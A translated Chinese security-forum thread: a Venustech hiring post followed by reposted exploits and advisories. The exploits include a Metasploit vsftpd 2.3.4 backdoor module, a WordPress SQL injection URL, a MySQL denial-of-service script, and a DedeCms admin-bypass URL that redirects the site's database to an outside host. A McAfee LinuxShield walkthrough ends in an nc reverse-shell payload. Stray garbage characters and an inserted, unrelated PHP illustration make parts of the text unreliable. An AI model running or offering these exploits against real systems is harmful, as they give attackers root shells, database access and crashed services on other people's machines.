
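[Recruitment] [Hiring] Venustech (启明星辰) R&D Recruitment

  • Position: Other
  • Company: Venustech (启明星辰)
  • Location: Beijing
  • Major required: Other
  • Education required: Bachelor's degree
  • Work experience: 2+ years
  • Salary: Negotiable
  • Age requirement: None
  • Gender requirement: None
  • Company website: http://www.venustech.com.cn
  • Résumé e-mail: xiaoyan@sitedirsec.com
  • Phone: 00000000000
  • QQ:
  • Security assistant: Recruitment and job applications go through the 非安全中国 administrators, QQ group: 57116771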


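  • ++++++++++ Notes on Venustech ++++++++++

    Just send me a private message on the site.

    I. R&D Center: Linux C Software Engineer (several openings)

    Responsibilities:

    1. Development and maintenance of software for embedded devices such as security gateways, firewalls and IPS

    Requirements:

    1. Proficient in C programming
    2. Skilled in using the Linux operating system; proficient in C programming on Linux
    3. Proficient in TCP/IP and other network protocols; familiar with application-layer protocols and protocol analysis
    4. Familiar with network security protocols and with security devices such as routers, switches and firewalls
    5. Familiar with the Linux kernel and kernel development

    II. R&D Center: Test Engineer (several openings)

    Responsibilities:

    1. Responsible for system testing and integration testing of products
    2. Responsible for writing, executing and revising product test cases
    3. Responsible for product performance testing
    4. Responsible for supporting and testing external projects

    Requirements:

    1. Basic knowledge of TCP/IP
    2. Solid data-communications fundamentals
    3. Some foundation in Linux
    4. Able to set up and use databases
    5. Familiar with at least one programming language: C/Perl/VBS/TCL
    6. Familiar with test case design, system testing and stress testing
    7. Familiar with firewall principles, with some understanding of firewall features
    8. Some understanding of how network security devices are deployed in a network
    9. Able to use test tools: Loadrunner, packet-analysis software, Spirent or IXIA test instruments

    III. R&D Center: Security Event Engineer (several openings)

    Responsibilities:

    1. Delivering the trojan detection service and the web vulnerability scanning service
    2. Technical support for service customers
    3. Research on web-page trojans, web vulnerabilities, worms, scanning, denial of service, buffer overflows and the like
    4. Routine updating and maintenance of the security event libraries of IDS/IPS/UTM/TDS/WAG/322 and other products
    5. Research on attack techniques, the TCP/IP protocol, and reverse engineering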


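    非安全中国 disclaimer:
    1. All statements and images in this post are solely the poster's personal opinion and do not represent the position of this site;
    2. This topic was posted by 小妍; the poster 小妍 complies with the six management rules in "Copyright and Disclaimer" and enjoys the corresponding rights;
    3. Other organizations or individuals must obtain the consent of the poster 小妍 and of this site before using, reposting or quoting this post;
    4. Parts of this post are reposted from other media and published on this site in order to pass on more information; this does not mean that the site endorses the views or vouches for their accuracy;
    5. If this post infringes your site's or your personal copyright, please notify this site immediately; the site will delete it promptly and offers its sincerest apologies;
    6. The site's administrators and moderators have the right to delete this post without notifying the poster in advance.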

    VSFTPD v2.3.4 Backdoor Command Execution Vulnerability

        ##
        # $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
        ##

        ##
        # This file is part of the Metasploit Framework and may be subject to
        # redistribution and commercial restrictions. Please see the Metasploit
        # Framework web site for more information on licensing and terms of use.
        # http://metasploit.com/framework/
        ##

        require 'msf/core'

        class Metasploit3 < Msf::Exploit::Remote
          Rank = ExcellentRanking

          include Msf::Exploit::Remote::Tcp

          def initialize(info = {})
            super(update_info(info,
              'Name'           => 'VSFTPD v2.3.4 Backdoor Command Execution',
              'Description'    => %q{
                  This module exploits a malicious backdoor that was added to the VSFTPD download
                  archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between
                  June 30th 2011 and July 1st 2011 according to the most recent information
                  available. This backdoor was removed on July 3rd 2011.
              },
              'Author'         => [ 'hdm', 'mc' ],
              'License'        => MSF_LICENSE,
              'Version'        => '$Revision: 13099 $',
              'References'     =>
                [
                  [ 'URL', 'http://pastebin.com/AetT9sS5' ],
                  [ 'URL', 'http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html' ],
                ],
              'Privileged'     => true,
              'Platform'       => [ 'unix' ],
              'Arch'           => ARCH_CMD,
              'Payload'        =>
                {
                  'Space'       => 2000,
                  'BadChars'    => '',
                  'DisableNops' => true,
                  'Compat'      =>
                    {
                      'PayloadType'    => 'cmd_interact',
                      'ConnectionType' => 'find'
                    }
                },
              'Targets'        =>
                [
                  [ 'Automatic', { } ],
                ],
              'DisclosureDate' => 'Jul 3 2011',
              'DefaultTarget'  => 0))

            register_options([ Opt::RPORT(21) ], self.class)
          end

          def exploit

            # If the backdoor's bind listener is already up, use it directly
            nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
            if nsock
              print_status("The port used by the backdoor bind listener is already open")
              handle_backdoor(nsock)
              return
            end

            # Connect to the FTP service port first
            connect

            banner = sock.get_once(-1, 30).to_s
            print_status("Banner: #{banner.strip}")

            sock.put("USER #{rand_text_alphanumeric(rand(6)+1)}:)\r\n")
            resp = sock.get_once(-1, 30).to_s
            print_status("USER: #{resp.strip}")

            if resp =~ /^530 /
              print_error("This server is configured for anonymous only and the backdoor code cannot be reached")
              disconnect
              return
            end

            if resp !~ /^331 /
              print_error("This server did not respond as expected: #{resp.strip}")
              disconnect
              return
            end

            sock.put("PASS #{rand_text_alphanumeric(rand(6)+1)}\r\n")

            # Do not bother reading the response from password, just try the backdoor
            nsock = self.connect(false, {'RPORT' => 6200}) rescue nil
            if nsock
              print_good("Backdoor service has been spawned, handling...")
              handle_backdoor(nsock)
              return
            end

            disconnect

          end

          def handle_backdoor(s)

            s.put("id\n")

            r = s.get_once(-1, 5).to_s
            if r !~ /uid=/
              print_error("The service on port 6200 does not appear to be a shell")
              disconnect(s)
              return
            end

            print_good("UID: #{r.strip}")

            s.put("nohup " + payload.encoded + " >/dev/null 2>&1")
            handler(s)
          end

        end
    Announcement: https://www.sitedirsec.com publishes the latest vulnerabilities; please follow it.


    WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability

    1. Description:

    SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    allows an authenticated user to execute arbitrary SQL commands via the id
    parameter to wp-admin/admin.php.

    2. Proof of Concept:

    http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id=1 AND SLEEP(10)

    3. Solution:

    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    for a hotfix.

    4. Reference:

    http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-injection-sqli/
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429

    MySQL 5.5.8 Remote Denial of Service Vulnerability

        import socket, sys

        print "\n"
        print "----------------------------------------------------------------"
        print "| MySQL 5.5.8 Null Ptr (windows)                                |"
        print "| Level Smash the Stack                                         |"
        print "----------------------------------------------------------------"
        print "\n"

        # First packet sent after connecting (login packet for user "root")
        buf=("&\x00\x00\x01\x85\xa2\x03\x00\x00\x00\x00@\x93\x00\x00\x00\x00\x00\x00\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00root\x00\x00")

        # Second packet: a query command
        buf2=("\x11\x00\x00\x00\x03set autocommit30")

        def usage():
            print "usage : ./mysql.py <victim_ip>"
            print "example: ./mysql.py 192.168.1.22"

        def main():
            if len(sys.argv) != 2:
                usage()
                sys.exit()
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

            HOST = sys.argv[1]
            PORT = int(3306)
            s.connect((HOST,PORT))
            print "\n[*] Connect"
            s.send(buf)
            print "\n[*] Payload 1 sent"
            s.send(buf2)
            print "\n[*] Payload 2 sent\n", "\n[*] Run again to ensure it is down..\n"
            s.close()

        if __name__ == "__main__":
            main()
    4 j* K6 Q6 u) \: Q; O5 q公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    Step-by-step Linux installation: setting up the virtual machine

    http://www.sitedir.com.cn/video/4.swf

    DedeCms (织梦) v5.6-5.7 Unauthorized Access Vulnerability

    http://www.XXXX.com/[DedeCms admin directory]/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

    Change validate=dcug above to the current CAPTCHA code and you go straight into the site's admin back end.

    This vulnerability requires knowing the admin back-end path.

    Official temporary fix:

    Find the file include/common.inc.php and replace:

        foreach($_REQUEST as $_k=>$_v)
        {
            var_dump($_k);
            if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) )
            {
                exit('Request var not allow!');
            }
        }

    with:

        // Check and register externally submitted variables
        function CheckRequest(&$val) {
            if (is_array($val)) {
                foreach ($val as $_k=>$_v) {
                    CheckRequest($_k);
                    CheckRequest($val[$_k]);
                }
            } else
            {
                if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) )
                {
                    exit('Request var not allow!');
                }
            }
        }
        CheckRequest($_REQUEST);
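The difference between the two checks in the DedeCms post above, as an added example (not DedeCms source and not part of the original post): both checks are run on constructed requests, one of which nests the blocked names under `_POST` the way the URL in the post does. The function names, the `BLOCKED` constant and the sample values are hypothetical; the checks return a boolean instead of calling `exit()` so they can be compared side by side.

```php
<?php
// Added illustration; not DedeCms source. Function names are hypothetical.
// Both functions use the pattern from the post's include/common.inc.php check.

const BLOCKED = '#^(cfg_|GLOBALS)#';

// "Before": only the top-level request keys are tested.
function topLevelCheck(array $request): bool
{
    foreach ($request as $k => $v) {
        $k = (string) $k;
        if (strlen($k) > 0 && preg_match(BLOCKED, $k)) {
            return false; // request rejected
        }
    }
    return true; // request accepted
}

// "After": every key and every scalar value, at any nesting depth, is tested.
function recursiveCheck($val): bool
{
    if (is_array($val)) {
        foreach ($val as $k => $v) {
            if (!recursiveCheck((string) $k) || !recursiveCheck($v)) {
                return false;
            }
        }
        return true;
    }
    $val = (string) $val;
    return !(strlen($val) > 0 && preg_match(BLOCKED, $val));
}

// Constructed query strings; hosts and values are placeholders.
$samples = [
    'ordinary login'     => 'dopost=login&userid=admin&validate=abcd',
    'direct cfg_ key'    => 'cfg_dbhost=db.example.invalid',
    'nested under _POST' => '_POST[GLOBALS][cfg_dbhost]=db.example.invalid',
];

foreach ($samples as $label => $query) {
    // parse_str() builds nested arrays from a[b][c]=v, as PHP does for $_REQUEST.
    parse_str($query, $request);
    printf(
        "%-20s top-level: %-7s recursive: %s\n",
        $label,
        topLevelCheck($request) ? 'accept' : 'reject',
        recursiveCheck($request) ? 'accept' : 'reject'
    );
}
```

For the nested request the only top-level key is `_POST`, which the pattern does not match, so the old loop accepts it; the recursive version reaches the `GLOBALS` and `cfg_dbhost` keys one and two levels down and rejects the request.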

    Step-by-step Linux installation: setting up the virtual machine tools

    http://www.sitedir.com.cn/video/8.swf

    Multiple security vulnerabilities in the Django development framework

    Published: 2011-09-12

    Affected versions:
    Django 1.2.5
    Django 1.3 beta 1
    Django 1.2.4
    Django 1.2.2
    Django 1.2

    Description:

    Django is an open-source web application framework written in Python.
    Django has multiple security vulnerabilities that allow an attacker to obtain sensitive information, manipulate data, carry out cache poisoning attacks, or cause a denial of service.
    1) When a cache backend is used, an error in session handling in django.contrib.sessions can be exploited to manipulate session information. Successful exploitation requires a known session key and an application that lets the attacker store dictionary-like objects in the cache under a valid session key.
    2) Django's model system includes a field type, URLField, that validates whether a supplied value is a valid URL; if the boolean keyword argument verify_exists is true, it also tries to verify the supplied URL and resolve it. By default the underlying socket has no timeout, so an attacker can send a crafted URL that consumes all server memory, causing a denial of service.
    3) There is an error in the handling of redirect responses when verifying URLs supplied to the "URLField" field type; an attacker can exploit it by returning a redirect response to a "file://" URL, which makes it possible to determine whether local files exist on the server.
    4) There is an error in the handling of the "X-Forwarded-Host" HTTP header when generating full-path URLs for redirect responses; an attacker can exploit it to carry out cache poisoning attacks.

    References:
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    http://secunia.com/advisories/45939/

    McAfee LinuxShield Local/Remote Code Execution Vulnerability

    McAfee LinuxShield remote/local code
    Affected versions: McAfee LinuxShield <= 1.5.1
    Remote attack: Yes
    Local overflow: Yes

    Background:
    ===========

    LinuxShield detects and removes viruses and other potentially unwanted
    software on Linux-based systems. LinuxShield uses the powerful McAfee
    scanning engine - the engine common to all our anti-virus products.

    Although a few years ago, the Linux operating system was considered a
    secure environment, it is now seeing more occurrences of software
    specifically written to attack or exploit security weaknesses in
    Linux-based systems. Increasingly, Linux-based systems interact with
    Windows-based computers. Although viruses written to attack Windows-
    based systems do not directly attack Linux systems, a Linux server
    can harbor these viruses, ready to infect any client that connects to
    it.

    When installed on your Linux systems, LinuxShield provides protection
    against viruses, Trojan horses, and other types of potentially
    unwanted software.

    LinuxShield scans files as they are opened and closed - a technique
    known as on-access scanning. LinuxShield also incorporates an
    on-demand scanner that enables you to scan any directory or file in
    your host at any time.

    When kept up-to-date with the latest virus-definition (DAT) files,
    LinuxShield is an important part of your network security. We
    recommend that you set up an anti-virus security policy for your
    network, incorporating as many protective measures as possible.

    LinuxShield uses a web-browser interface, and a large number of
    LinuxShield installations can be centrally controlled by ePolicy
    Orchestrator.

    (Product description from LinuxShield Product Guide)

    Description:
    ============

    This vulnerability allows remote attackers to execute arbitrary code
    on vulnerable installations of McAfee LinuxShield. User interaction
    is not required to exploit this vulnerability but an attacker must
    be authenticated.

    The LinuxShield Webinterface communicates with the locally installed
    "nailsd" daemon, which listens on port 65443/tcp, to do configuration
    changes, query the configuration and execute tasks.

    Each user, which can login to the victim box, can also authenticate
    itself to the "nailsd" and can do configuration changes and execute
    tasks with root privileges.

    A direct execution of commands is not possible, but it is possible to
    download and execute code through manipulation of the config and
    execute schedule tasks of the LinuxShield.

        walk-through (after the TLS handshake):
        +--------------------------------------

        nailsd > +OK welcome to the NAILS Statistics Service
        attacker> auth <user> <pass>
        nailsd > +OK successful authentication

        # Set the Attacker repository to download our code from a httpd
        # (catalog.z)
        #---------------------------------------------------------------
        attacker> db set 1 _table=repository status=1 siteList=<?xml version
                  ="1.0" encoding="UTF-8"?><ns:SiteLists xmlns:ns="naSiteLi
                  st" GlobalVersion="20030131003110" LocalVersion="20091209
                  161903" Type="Client"><SiteList Default="1" Name="SomeGU
                  ID"><HttpSite Type="repository" Name="EvilRepo" Order="1
                  " Server="<attackerhost>:80" Enabled="1" Local="1"><Rela
                  tivePath>nai</RelativePath><UseAuth>0</UseAuth><UserName></
                  UserName><Password Encrypted="0"/></HttpSite></SiteList></
                  ns:SiteLists> _cmd=update
        nailsd > +OK database changes buffered.

        # Execute task to set the attacker repository
        #---------------------------------------------------------------
        attacker> task setsitelist
        nailsd > +OK setting sitelist from CMA.

        # Execute the default Update task to download the code
        #---------------------------------------------------------------
        attacker> task nstart LinuxShield Update
        nailsd > +OK task LinuxShield Update starting

        # Create a Scan profile, which executes our code. The profiles are
        # not stored in the database.
        # Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
        #---------------------------------------------------------------
        attacker> sconf ODS_99 begin
        nailsd > +OK 1260400888

        # Set the variable "nailsd.profile.ODS_99.scannerPath" to the path
        # where our earlier downloaded catalog.z file is stored.
        # (/opt/McAfee/cma/scratch/update/catalog.z)
        #---------------------------------------------------------------
        attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
                  true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O
                  DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
                  10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
                  ine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
                  file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
                  ir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
                  ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd
                  .profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
                  risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
                  e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99
                  .mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
                  le.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil
                  dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
                  e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr
                  ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
                  o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
                  .ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t
                  rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
                  ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
                  00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
                  ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
                  ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
                  nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
                  ofile.ODS_99.filter.extensions.type=extension nailsd.profil
                  e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
                  .action.Default.secondary=Quarantine nailsd.profile.ODS_99.
                  action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
                  econdary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa
                  ss nailsd.profile.ODS_99.action.error=Block
        nailsd > +OK configuration changes buffered
        attacker> sconf ODS_99 commit 1260400888
        nailsd > +OK configuration changes stored

        # Set a scan task with the manipulated profile to execute the code
        #---------------------------------------------------------------
        attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
                  pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
                  mp;exclude:false timetable=type=unscheduled taskResults=
                  _lastRun=1260318482 status=Stopped _cmd=insert
        nailsd > +OK database changes buffered

        # Execute scan task to execute the code
        #---------------------------------------------------------------
        attacker> task nstart Evil Task

        +-------------------------------------- walk-through EOF

    To get a reverse root shell place something like this in the catalog.z

        --- snip ---
        #!/bin/sh
        nc -nv <attacker_host> 4444 -e /bin/sh
        --- /snip ---

    Proof of Concept :
    ==================

    http://inj3ct0r.com/sploits/11165.tar.gz

    Solution:
    =========

    McAfee Advisory
    +--------------
    https://kc.mcafee.com/corporate/index?page=content&id=SB10007

    Disclosure Timeline (YYYY/MM/DD):
    =================================

    2009.12.07: Vulnerability found
    2010.02.03: Asked vendor for a PGP key
    2010.02.05: Vendor sent his PGP key
    2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
                date (2010.02.18) to Vendor
    2010.02.05: Vendor acknowledges the reception of the advisory
    2010.02.16: Ask for a status update, because the planned release date is
                2010.02.18.
    2010.02.16: Vendor response that, they are currently working on a patch
    2010.02.17: Changed release date to 2010.02.25.
    2010.02.22: Vendor gives a status update, that they are able to release
                the patch on 2010.02.25.
    2010.02.24: Ask for a list of affected products and the advisory url.
    2010.02.24: Vendor sends the list.
    2010.03.02: Release of this Advisory